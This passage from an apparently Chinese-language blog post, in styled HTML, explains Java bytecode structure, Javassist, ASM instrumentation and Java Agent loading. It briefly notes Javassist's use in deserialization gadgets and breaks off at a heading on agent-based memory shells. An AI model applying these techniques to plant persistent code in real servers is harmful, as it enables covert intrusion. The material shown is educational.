102);line-height: 26px;">8</span>          <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// "<init>":()V</span>  #<span style="color: rgb(209, 154, 102);line-height: 26px;">19</span> = NameAndType        #<span style="color: rgb(209, 154, 102);line-height: 26px;">5</span>:#<span style="color: rgb(209, 154, 102);line-height: 26px;">6</span>          <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// m:I</span>  #<span style="color: rgb(209, 154, 102);line-height: 26px;">20</span> = Utf8               com/rhythm7/Main  #<span style="color: rgb(209, 154, 102);line-height: 26px;">21</span> = Utf8               java/lang/Object{  <span style="color: rgb(198, 120, 221);line-height: 26px;">private</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> m;    descriptor: I    flags: ACC_PRIVATE<span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//方法表集合，对类内部的方法描述，私有变量m，类型int，返回int</span>          <span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> com.rhythm7.Main();    descriptor: ()V    flags: ACC_PUBLIC        <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//构造方法,属性public</span>    Code:      stack=<span style="color: rgb(209, 154, 102);line-height: 26px;">1</span>,<span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/*最大操作数栈*/</span>           locals=<span style="color: rgb(209, 154, 102);line-height: 26px;">1</span>,<span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//局部变量所需存储空间（单位slot-4字节）</span>      args_size=<span style="color: rgb(209, 154, 102);line-height: 26px;">1</span><span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//（方法参数个数）</span>         <span style="color: rgb(209, 154, 102);line-height: 26px;">0</span>: aload_0         <span style="color: rgb(209, 154, 102);line-height: 26px;">1</span>: invokespecial #<span style="color: rgb(209, 154, 102);line-height: 26px;">1</span>                  <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// Method java/lang/Object."<init>":()V</span>         <span style="color: rgb(209, 154, 102);line-height: 26px;">4</span>: <span style="color: rgb(198, 120, 221);line-height: 26px;">return</span>             <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//方法体内容，0,1,4为字节码行号</span>                                             LineNumberTable:        line <span style="color: rgb(209, 154, 102);line-height: 26px;">3</span>: <span style="color: rgb(209, 154, 102);line-height: 26px;">0</span>            <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//描述源码行号与字节码行号(字节码偏移量)之间的对应关系，可以使用 -g:none 或-g:lines选项来取消或要求生成这项信息，如果选择不生成LineNumberTable，当程序运行异常时将无法获取到发生异常的源码行号，也无法按照源码的行数来调试程序。</span>      LocalVariableTable:        Start <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/*局部变量在哪一行开始可见*/</span> Length<span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/*可见行数*/</span>  Slot<span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/*所在帧栈位置*/</span>  Name  <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/*变量名称*/</span> Signature<span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/*类型签名*/</span>            <span style="color: rgb(209, 154, 102);line-height: 26px;">0</span>       <span style="color: rgb(209, 154, 102);line-height: 26px;">5</span>     <span style="color: rgb(209, 154, 102);line-height: 26px;">0</span>  <span style="color: rgb(198, 120, 221);line-height: 26px;">this</span>              <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// 帧栈中局部变量与源码中定义的变量之间的关系.可以使用 -g:none 或 -g:vars来取消或生成这项信息，如果没有生成这项信息，那么当别人引用这个方法时，将无法获取到参数名称，取而代之的是arg0, arg1这样的占位符。</span>            Lcom/rhythm7/Main;  <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">inc</span><span style="line-height: 26px;">()</span></span>;    descriptor: ()I    flags: ACC_PUBLIC    Code:      stack=<span style="color: rgb(209, 154, 102);line-height: 26px;">2</span>, locals=<span style="color: rgb(209, 154, 102);line-height: 26px;">1</span>, args_size=<span style="color: rgb(209, 154, 102);line-height: 26px;">1</span>         <span style="color: rgb(209, 154, 102);line-height: 26px;">0</span>: aload_0         <span style="color: rgb(209, 154, 102);line-height: 26px;">1</span>: getfield      #<span style="color: rgb(209, 154, 102);line-height: 26px;">2</span>                  <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// Field m:I</span>         <span style="color: rgb(209, 154, 102);line-height: 26px;">4</span>: iconst_1         <span style="color: rgb(209, 154, 102);line-height: 26px;">5</span>: iadd         <span style="color: rgb(209, 154, 102);line-height: 26px;">6</span>: ireturn      LineNumberTable:        line <span style="color: rgb(209, 154, 102);line-height: 26px;">8</span>: <span style="color: rgb(209, 154, 102);line-height: 26px;">0</span>      LocalVariableTable:        Start  Length  Slot  Name   Signature            <span style="color: rgb(209, 154, 102);line-height: 26px;">0</span>       <span style="color: rgb(209, 154, 102);line-height: 26px;">7</span>     <span style="color: rgb(209, 154, 102);line-height: 26px;">0</span>  <span style="color: rgb(198, 120, 221);line-height: 26px;">this</span>   Lcom/rhythm7/Main;}SourceFile: <span style="color: rgb(152, 195, 121);line-height: 26px;">"Main.java"</span><span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//类名</span></p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">访问标识如下表</p><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">image-20230727143748956.png</figcaption></figure><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">字段类型如下表</p><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">image-20230727144315979.png</figcaption></figure><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">javassist</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Javassist (JAVA programming ASSISTant) 是在 Java 中编辑字节码的类库;它使 Java 程序能够在运行时定义一个新类, 并在 JVM 加载时修改类文件</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">ClassPool pool = ClassPool.getDefault();CtClass cc = pool.get(<span style="color: rgb(152, 195, 121);line-height: 26px;">"test.Rectangle"</span>);cc.setSuperclass(pool.get(<span style="color: rgb(152, 195, 121);line-height: 26px;">"test.Point"</span>));cc.writeFile();</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">反序列化gadget中使用，将我们打过去的字节码还原成类然后给classloader用于实例化</p><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">ASM</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">对于需要手动操纵字节码的需求，可以使用ASM，它可以直接生产 .class字节码文件,也可以在类被加载入JVM之前动态修改类行为,但是程序开始运行以后无法修改，只能用java agnet注入的方式修改</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">ASM Core API可以类比解析XML文件中的SAX方式，不需要把这个类的整个结构读取进来，就可以用流式的方法来处理字节码文件</p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">演示类</p><pre style="font-size: 1em;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 4px 2px;color: rgb(30, 107, 184);background: rgb(40, 44, 52);border-radius: 5px;margin-right: 2px;margin-left: 2px;word-break: break-all;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">Base</span> </span>{    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">process</span><span style="line-height: 26px;">()</span></span>{        System.out.println(<span style="color: rgb(152, 195, 121);line-height: 26px;">"process"</span>);    }}</p></pre><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">ASM</p><pre style="font-size: 1em;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 4px 2px;color: rgb(30, 107, 184);background: rgb(40, 44, 52);border-radius: 5px;margin-right: 2px;margin-left: 2px;word-break: break-all;"><span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> org.objectweb.asm.ClassReader;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> org.objectweb.asm.ClassVisitor;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> org.objectweb.asm.ClassWriter;<span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">Generator</span> </span>{    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">static</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">main</span><span style="line-height: 26px;">(String[] args)</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">throws</span> Exception </span>{  <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//读取</span>        ClassReader classReader = <span style="color: rgb(198, 120, 221);line-height: 26px;">new</span> ClassReader(<span style="color: rgb(152, 195, 121);line-height: 26px;">"meituan/bytecode/asm/Base"</span>);        ClassWriter classWriter = <span style="color: rgb(198, 120, 221);line-height: 26px;">new</span> ClassWriter(ClassWriter.COMPUTE_MAXS);        <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//处理</span>        ClassVisitor classVisitor = <span style="color: rgb(198, 120, 221);line-height: 26px;">new</span> MyClassVisitor(classWriter);        classReader.accept(classVisitor, ClassReader.SKIP_DEBUG);        <span style="color: rgb(198, 120, 221);line-height: 26px;">byte</span>[] data = classWriter.toByteArray();        <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//输出</span>        File f = <span style="color: rgb(198, 120, 221);line-height: 26px;">new</span> File(<span style="color: rgb(152, 195, 121);line-height: 26px;">"operation-server/target/classes/meituan/bytecode/asm/Base.class"</span>);        FileOutputStream fout = <span style="color: rgb(198, 120, 221);line-height: 26px;">new</span> FileOutputStream(f);        fout.write(data);        fout.close();        System.out.println(<span style="color: rgb(152, 195, 121);line-height: 26px;">"now generator cc success!!!!!"</span>);    }}<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> org.objectweb.asm.ClassVisitor;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> org.objectweb.asm.MethodVisitor;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> org.objectweb.asm.Opcodes;<span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">MyClassVisitor</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">extends</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">ClassVisitor</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">implements</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">Opcodes</span> </span>{    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">MyClassVisitor</span><span style="line-height: 26px;">(ClassVisitor cv)</span> </span>{        <span style="color: rgb(198, 120, 221);line-height: 26px;">super</span>(ASM5, cv);    }    <span style="color: rgb(97, 174, 238);line-height: 26px;">@Override</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">visit</span><span style="line-height: 26px;">(<span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> version, <span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> access, String name, String signature,                      String superName, String[] interfaces)</span> </span>{        cv.visit(version, access, name, signature, superName, interfaces);    }    <span style="color: rgb(97, 174, 238);line-height: 26px;">@Override</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> MethodVisitor <span style="color: rgb(97, 174, 238);line-height: 26px;">visitMethod</span><span style="line-height: 26px;">(<span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> access, String name, String desc, String signature, String[] exceptions)</span> </span>{        MethodVisitor mv = cv.visitMethod(access, name, desc, signature,                exceptions);        <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//Base类中有两个方法：无参构造以及process方法，这里不增强构造方法</span>        <span style="color: rgb(198, 120, 221);line-height: 26px;">if</span> (!name.equals(<span style="color: rgb(152, 195, 121);line-height: 26px;">"<init>"</span>) && mv != <span style="color: rgb(198, 120, 221);line-height: 26px;">null</span>) {            mv = <span style="color: rgb(198, 120, 221);line-height: 26px;">new</span> MyMethodVisitor(mv);        }        <span style="color: rgb(198, 120, 221);line-height: 26px;">return</span> mv;    }    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">MyMethodVisitor</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">extends</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">MethodVisitor</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">implements</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">Opcodes</span> </span>{        <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">MyMethodVisitor</span><span style="line-height: 26px;">(MethodVisitor mv)</span> </span>{            <span style="color: rgb(198, 120, 221);line-height: 26px;">super</span>(Opcodes.ASM5, mv);        }        <span style="color: rgb(97, 174, 238);line-height: 26px;">@Override</span>        <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">visitCode</span><span style="line-height: 26px;">()</span> </span>{            <span style="color: rgb(198, 120, 221);line-height: 26px;">super</span>.visitCode();            mv.visitFieldInsn(GETSTATIC, <span style="color: rgb(152, 195, 121);line-height: 26px;">"java/lang/System"</span>, <span style="color: rgb(152, 195, 121);line-height: 26px;">"out"</span>, <span style="color: rgb(152, 195, 121);line-height: 26px;">"Ljava/io/PrintStream;"</span>);            mv.visitLdcInsn(<span style="color: rgb(152, 195, 121);line-height: 26px;">"start"</span>);            mv.visitMethodInsn(INVOKEVIRTUAL, <span style="color: rgb(152, 195, 121);line-height: 26px;">"java/io/PrintStream"</span>, <span style="color: rgb(152, 195, 121);line-height: 26px;">"println"</span>, <span style="color: rgb(152, 195, 121);line-height: 26px;">"(Ljava/lang/String;)V"</span>, <span style="color: rgb(198, 120, 221);line-height: 26px;">false</span>);        }        <span style="color: rgb(97, 174, 238);line-height: 26px;">@Override</span>        <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">visitInsn</span><span style="line-height: 26px;">(<span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> opcode)</span> </span>{            <span style="color: rgb(198, 120, 221);line-height: 26px;">if</span> ((opcode >= Opcodes.IRETURN && opcode <= Opcodes.RETURN)                    || opcode == Opcodes.ATHROW) {                <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//方法在返回之前，打印"end"</span>                mv.visitFieldInsn(GETSTATIC, <span style="color: rgb(152, 195, 121);line-height: 26px;">"java/lang/System"</span>, <span style="color: rgb(152, 195, 121);line-height: 26px;">"out"</span>, <span style="color: rgb(152, 195, 121);line-height: 26px;">"Ljava/io/PrintStream;"</span>);                mv.visitLdcInsn(<span style="color: rgb(152, 195, 121);line-height: 26px;">"end"</span>);                mv.visitMethodInsn(INVOKEVIRTUAL, <span style="color: rgb(152, 195, 121);line-height: 26px;">"java/io/PrintStream"</span>, <span style="color: rgb(152, 195, 121);line-height: 26px;">"println"</span>, <span style="color: rgb(152, 195, 121);line-height: 26px;">"(Ljava/lang/String;)V"</span>, <span style="color: rgb(198, 120, 221);line-height: 26px;">false</span>);            }            mv.visitInsn(opcode);        }    }}</p></pre></div></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">ClassReader：用于读取已经编译好的.class文件</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">ClassWriter：用于重新构建编译后的类，如修改类名、属性以及方法，也可以生成新的类的字节码文件</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">各种Visitor类：如上所述，CoreAPI根据字节码从上到下依次处理，对于字节码文件中不同的区域有不同的Visitor，比如用于访问方法的MethodVisitor、用于访问类变量的FieldVisitor、用于访问注解的AnnotationVisitor等</p></li></ul><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">ASM Tree API可以类比解析XML文件中的DOM方式，把整个类的结构读取到内存中</p></div></li></ul><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">ASM指令工具</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">ASM ByteCode Outline</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">安装后，右键选择“Show Bytecode Outline”，在新标签页中选择“ASMified”这个tab,就可以看到这个类中的代码对应的ASM写法</p><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JAVA Agent</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">VMTI (JVM Tool Interface)是Java虚拟机对外提供的Native编程接口，通过JVMTI，外部进程可以获取到运行时JVM的诸多信息，比如线程、GC等。Agent是一个运行在目标JVM的特定程序，它的职责是负责从目标JVM中获取数据，然后将数据传递给外部进程。加载Agent的时机可以是目标JVM启动之时，也可以是在目标JVM运行时进行加载</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JVMTI是一套Native接口，可以使用Java的Instrumentation接口(java.lang.instrument)来编写Agent</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">有权限启动jar，在目标JVM启动时加载</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">[<span style="color: rgb(209, 154, 102);line-height: 26px;">1</span>] <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">static</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">premain</span><span style="line-height: 26px;">(String agentArgs, Instrumentation inst)</span></span>;[<span style="color: rgb(209, 154, 102);line-height: 26px;">2</span>] <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">static</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">premain</span><span style="line-height: 26px;">(String agentArgs)</span></span>;</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">在目标JVM运行时加载Agent</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">[1] public static void agentmain(String agentArgs, Instrumentation inst);[2] public static void agentmain(String agentArgs);</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Agent需要打包成一个jar包，在ManiFest属性中指定“Premain-Class”或者“Agent-Class”：</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">Premain-Class: classAgent-Class: class</p></pre><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">挂载到目标JVM</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">将编写的Agent打成jar包后，就可以挂载到目标JVM上去了。如果选择在目标JVM启动时加载Agent，则可以使用 “-javaagent:[=]“</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">使用com.sun.tools.attach.VirtualMachine进行动态挂载Agent</p></li></ul></ul><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">java agent内存马</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: 